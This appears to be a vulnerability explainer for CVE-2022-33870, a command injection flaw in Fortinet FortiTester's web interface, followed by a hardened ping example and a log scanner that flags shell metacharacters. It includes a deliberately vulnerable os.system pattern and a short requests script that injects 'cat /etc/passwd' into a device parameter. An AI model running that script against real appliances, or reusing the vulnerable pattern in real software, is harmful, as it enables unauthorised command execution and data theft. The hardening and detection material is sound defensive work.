Discovered: 2022
Applies to: Fortinet FortiTester (versions 3.0.0-3.9.1, 4.0.0-4.2.0, 7.0.0-7.1.0)
Vulnerability type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE Reference: CWE-78
Official Advisory: Fortinet PSIRT Advisory
What Is CVE-2022-33870?
A programming bug in Fortinet's FortiTester product let attackers run system commands on the device. That’s as bad as it sounds: attackers could, for example, create new users, open backdoors, or even cripple whole systems—all by misusing arguments in the web management interface.
The key reason? FortiTester didn’t properly clean (or “neutralize”) user-supplied information before sending it to the operating system’s command line. This is a textbook case of a *command injection* bug.
How Does The Exploit Work?
Whenever software takes user input and passes it directly to the system shell (like /bin/sh), it’s super important to filter out any characters that could change what the command actually does. For example: if you let someone add a ; (semicolon) into a form, the shell interprets that as, "run this next command too!"
In FortiTester versions listed above, an authenticated user could send a web request (with a specially crafted argument—like a command followed by a semicolon and another command) and trick the server into running extra commands.
Let’s look at a *hypothetical* dangerous code pattern in Python (for illustration):

```python
import os

def run_ping(hostname):
    # DANGEROUS: hostname is interpolated directly into a shell command string
    cmd = "ping -c 4 %s" % hostname
    os.system(cmd)  # the shell parses the whole string, metacharacters included

# A malicious user enters: 127.0.0.1; uname -a
run_ping("127.0.0.1; uname -a")  # Executes ping, then 'uname -a'
```
If FortiTester’s backend works like this, and someone enters 8.8.8.8; ls /, the device would both ping 8.8.8.8 and then list every file in the root directory—and there would be no security check stopping them.
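To make the difference concrete, here is an added example (not FortiTester code and not from the original post) that places the vulnerable pattern beside a hardened one. `build_ping_shell_string` reproduces the page's dangerous string-building but only returns the string; `shell_command_count` tokenises it the way a POSIX shell would, so you can see that `8.8.8.8; ls /` becomes two commands. `validate_target` and `build_ping_argv` are the fix: allow-list the input (an IP literal or a plain DNS name) and hand `subprocess` an argv list so no shell ever parses the value. All function names are my own.

```python
import ipaddress
import shlex
import subprocess


def build_ping_shell_string(hostname: str) -> str:
    """The page's vulnerable pattern, kept as a string builder only.
    Returned for inspection; never passed to os.system() here."""
    return "ping -c 4 %s" % hostname


def shell_command_count(command: str) -> int:
    """Tokenise like a POSIX shell and count the commands the shell would run:
    one plus the number of ; & | && || separators found."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    separators = {";", "&", "|", "&&", "||"}
    return 1 + sum(1 for tok in lexer if tok in separators)


def validate_target(target: str) -> str:
    """Allow-list validation: accept an IPv4/IPv6 literal or a plain DNS
    hostname (ASCII letters, digits, hyphens). Anything else is rejected,
    which covers ';', '$', quotes, spaces and newlines in one rule."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass  # not an IP literal; fall through to hostname rules
    if not target or len(target) > 253:
        raise ValueError(f"invalid target: {target!r}")
    for label in target.rstrip(".").split("."):
        if not label or len(label) > 63:
            raise ValueError(f"invalid target: {target!r}")
        if label[0] == "-" or label[-1] == "-":
            raise ValueError(f"invalid target: {target!r}")
        if not all(c.isascii() and (c.isalnum() or c == "-") for c in label):
            raise ValueError(f"invalid target: {target!r}")
    return target


def build_ping_argv(target: str) -> list:
    """Hardened form: validated value placed in an argv list.
    The target is one argument; no shell is involved at any point."""
    return ["ping", "-c", "4", validate_target(target)]


def run_ping_safe(target: str) -> subprocess.CompletedProcess:
    # shell=False is the default; the argv list goes straight to execve().
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True)


if __name__ == "__main__":
    injected = "8.8.8.8; ls /"  # constructed attacker-style input
    unsafe = build_ping_shell_string(injected)
    print(f"{unsafe!r} -> {shell_command_count(unsafe)} shell commands")
    try:
        build_ping_argv(injected)
    except ValueError as exc:
        print("hardened version rejected it:", exc)
    print("hardened argv:", build_ping_argv("8.8.8.8"))
```

The allow-list is deliberately strict: rather than trying to enumerate every dangerous shell character, it states what a valid target looks like and refuses everything else. Even with that validation, the argv-list call is the real boundary, because it removes the shell from the execution path entirely.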
Attackers could also pivot deeper, using the compromised FortiTester as a foothold onto other machines on the network.
Attackers could automate these attacks with simple scripts, for example, using Python's requests module:
```python
import requests

url = 'https://vulnerable-fortitester/device/config/test'
# Update with valid session cookies, headers, etc.
payload = {
    'target': '8.8.8.8; cat /etc/passwd'
}
res = requests.post(url, data=payload, verify=False)
print(res.text)  # May include sensitive file content if exploited!
```
Requirement: the attacker needs to be logged in to the web management interface.
- Attackers with less skill look for default/weak passwords, or unguarded networks.
Fixes and Mitigation
Fortinet has released patches. Upgrade to:
FortiTester 7.1.1 or later
Don't delay!
See the official Fortinet advisory for the latest details.
References & Further Reading
- Fortinet Security Advisory FG-IR-22-183
- NVD CVE-2022-33870 Details
- NIST CWE-78: OS Command Injection
- OWASP: Command Injection
Conclusion
CVE-2022-33870 is another warning about the risks of trusting user input—especially in security and network appliances. Always sanitize, validate, and, when possible, never pass unchecked data into system commands.
Patching and monitoring are your best defenses. Don’t let a simple bug open the gate to your whole network.
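Monitoring is only useful if it looks for the right thing. The following added example (my own code, not part of the original post and not a FortiTester feature) scans web-server access-log lines for request parameters that contain shell metacharacters, which is the signature of the injection pattern described above. The log lines are constructed samples in Apache/nginx combined format, with a made-up `/device/config/test?target=` endpoint mirroring the post's illustration; adapt `REQUEST_RE` to whatever format your appliance or reverse proxy actually writes.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (combined log format); not real FortiTester logs.
SAMPLE_LOG = """\
10.0.0.5 - admin [11/Feb/2023:10:01:02 +0000] "GET /device/config/test?target=8.8.8.8 HTTP/1.1" 200 512
10.0.0.5 - admin [11/Feb/2023:10:01:09 +0000] "GET /device/config/test?target=8.8.8.8%3B+cat+%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.0.0.9 - guest [11/Feb/2023:10:02:11 +0000] "GET /login HTTP/1.1" 200 128
10.0.0.7 - admin [11/Feb/2023:10:03:40 +0000] "GET /device/config/test?target=%24(id) HTTP/1.1" 500 77
"""

# Client IP, user, timestamp, request line and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters a POSIX shell treats specially: separators, pipes, substitution,
# redirection, grouping and newlines. Matched against the URL-decoded value.
META_RE = re.compile(r'[;&|`$<>(){}\n]')


def suspicious_params(line: str) -> list:
    """Return one finding per query parameter whose decoded value contains
    shell metacharacters. Lines that do not parse are skipped silently."""
    match = REQUEST_RE.match(line)
    if not match:
        return []
    parts = urlsplit(match.group("path"))
    findings = []
    # parse_qsl percent-decodes and turns '+' into spaces, so '%3B' becomes ';'.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        metachars = sorted(set(META_RE.findall(value)))
        if metachars:
            findings.append({
                "ip": match.group("ip"),
                "user": match.group("user"),
                "timestamp": match.group("ts"),
                "path": parts.path,
                "param": key,
                "value": value,
                "metachars": metachars,
                "status": match.group("status"),
            })
    return findings


def scan_log(text: str) -> list:
    """Run suspicious_params over every non-empty line of a log body."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(suspicious_params(line))
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} user={hit['user']} "
              f"{hit['path']} {hit['param']}={hit['value']!r} "
              f"metachars={hit['metachars']} status={hit['status']}")
```

Decoding before matching matters: the second sample line carries `%3B`, which a naive grep for `;` on the raw log would miss. This check is a coarse first filter (a legitimate value could contain `&` or `$`), so route its findings into review rather than treating every hit as a confirmed exploit attempt, and pair it with the patch-level check that actually closes the hole.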
Timeline
Published on: 11/02/2022 12:15:00 UTC
Last modified on: 11/04/2022 13:42:00 UTC